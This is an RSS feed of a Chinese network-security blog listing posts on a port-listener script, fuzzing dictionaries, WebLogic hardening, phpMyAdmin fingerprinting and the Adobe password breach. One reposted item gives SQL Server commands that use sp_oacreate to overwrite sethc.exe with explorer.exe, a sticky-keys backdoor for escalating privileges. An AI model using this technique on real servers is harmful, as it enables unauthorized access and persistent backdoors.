<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>网管小王的博客 - 网络安全</title><link>http://www.5iadmin.com/</link><description>长期关注网络安全,网管,网络管理,网络管理员,网管软件,网络工程师 - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 91204</generator><language>zh-CN</language><copyright>Copyright 2010-2011 www.5iadmin.comvar _bdhmProtocol = ((&amp;quot;https:&amp;quot; == document.location.protocol) ? &amp;quot; https://&amp;quot; : &amp;quot; http://&amp;quot;);document.write(unescape(&amp;quot;%3Cscript src='&amp;quot; + _bdhmProtocol + &amp;quot;hm.baidu.com/h.js%3F29167fc4c70e297e903b22dbcedc0bd3' type='text/javascript'%3E%3C/script%3E&amp;quot;));</copyright><pubDate>Tue, 07 Apr 2026 10:04:43 +0800</pubDate><item><title>python3实现监听本地指定端口，并输出接收到的数据</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1089.html</link><pubDate>Sun, 06 Aug 2023 18:39:20 +0800</pubDate><guid>http://www.5iadmin.com/post/1089.html</guid><description><![CDATA[<p>帮朋友写了一个poython3监听本地指定端口的脚本，可自定义监听端口，比如80端口，脚本运行时，可以将接收到的数据显示，并输出到指定文本中，脚本在开发过程中遇到了强制关闭连接、非打印字符造成脚本退出等问题，都一一解决，目前脚本可长期稳定运行。脚本运行了一段时间，捕获到了一些攻击行为，网络暗潮涌动。本脚本有偿出售，感兴趣的朋友可以与我联系，vx：wangjiaoshou658732。</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1089.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1089</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1089&amp;key=a1ff95d7</trackback:ping></item><item><title>fuzz字典</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1088.html</link><pubDate>Mon, 05 Nov 2018 15:53:09 +0800</pubDate><guid>http://www.5iadmin.com/post/1088.html</guid><description><![CDATA[<p>https://github.com/fuzzdb-project/fuzzdb</p><p>https://fuzz.wget.lc/Fuzz/</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1088.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1088</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1088&amp;key=c1b78767</trackback:ping></item><item><title>各种信息安全思维导图</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1087.html</link><pubDate>Mon, 29 Oct 2018 08:23:29 +0800</pubDate><guid>http://www.5iadmin.com/post/1087.html</guid><description><![CDATA[<p>&nbsp;https://github.com/phith0n/Mind-Map</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1087.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1087</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1087&amp;key=b3400706</trackback:ping></item><item><title>中间件WebLogic服务安全加固</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1086.html</link><pubDate>Fri, 19 Oct 2018 08:20:57 +0800</pubDate><guid>http://www.5iadmin.com/post/1086.html</guid><description><![CDATA[<p><span style="font-size: 14.4px;">WebLogic是用于集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器，在各行业都有广泛的应用。WebLogic上部署的Web项目的后台数据库一般为Oracle数据库，数据库中往往存有大量数据，备受入侵者&ldquo;青睐&rdquo;。</span></p><p>&nbsp;</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1086.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1086</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1086&amp;key=6ee9f004</trackback:ping></item><item><title>加字符批处理命令</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1082.html</link><pubDate>Sat, 25 Mar 2017 14:23:52 +0800</pubDate><guid>http://www.5iadmin.com/post/1082.html</guid><description><![CDATA[<p>&nbsp;@echo off</p><div>for /F &quot;tokens=*&quot; %%i in (c:\1dao4zimu.txt) do echo www.%%i.com&gt;&gt;c:\1.txt</div>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1082.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1082</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1082&amp;key=08b4612f</trackback:ping></item><item><title>识别phpmyadmin的方法</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1081.html</link><pubDate>Mon, 10 Mar 2014 14:18:40 +0800</pubDate><guid>http://www.5iadmin.com/post/1081.html</guid><description><![CDATA[<p>&nbsp;识别phpmyadmin的方法：访问/phpmyadmin/，返回Welcome to &lt;bdo dir=&quot;ltr&quot; xml:lang=&quot;en&quot;&gt;phpMyAdmin</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1081.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1081</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1081&amp;key=42d55f78</trackback:ping></item><item><title>Top 100 Adobe Passwords with Count</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1074.html</link><pubDate>Thu, 07 Nov 2013 11:52:29 +0800</pubDate><guid>http://www.5iadmin.com/post/1074.html</guid><description><![CDATA[<p>We do not (yet) have the keys Adobe used to encrypt the passwords of 130,324,429 users affected by their most recent breach. However, thanks to Adobe choosing symmetric key encryption over hashing, selecting ECB mode, and using the same key for every password, combined with a large number of known plaintexts and the generosity of users who flat-out gave us their password in their password hint, this is not preventing us from presenting you with this list of the top 100 passwords selected by Adobe users.</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1074.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1074</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1074&amp;key=64daab51</trackback:ping></item><item><title>【转】sa无xp_cmdshell下提升权限简单方法</title><author>369459071@qq.com (admin)</author><link>http://www.5iadmin.com/post/1061.html</link><pubDate>Wed, 18 Sep 2013 08:16:19 +0800</pubDate><guid>http://www.5iadmin.com/post/1061.html</guid><description><![CDATA[<p>在用exec sp_oacreate ''wscript.shell''也没办法的情况下。。可用此方法 <br />　　（很多服务器都把''wscript.shell''给删了。） <br />　　上网找了些资料，得到下面方法： <br />　　复制文件： <br />　　declare @o int <br />　　exec sp_oacreate ''scripting.filesystemobject'', @o out <br />　　exec sp_oamethod @o, ''copyfile'',null,''c:\windows\explorer.exe'' ,''c:\windows\system32\sethc.exe''; <br />　　declare @oo int <br />　　exec sp_oacreate ''scripting.filesystemobject'', @oo out</p>]]></description><category>网络安全</category><comments>http://www.5iadmin.com/post/1061.html#comment</comments><wfw:comment>http://www.5iadmin.com/</wfw:comment><wfw:commentRss>http://www.5iadmin.com/feed.asp?cmt=1061</wfw:commentRss><trackback:ping>http://www.5iadmin.com/cmd.asp?act=tb&amp;id=1061&amp;key=d1dff550</trackback:ping></item></channel></rss>
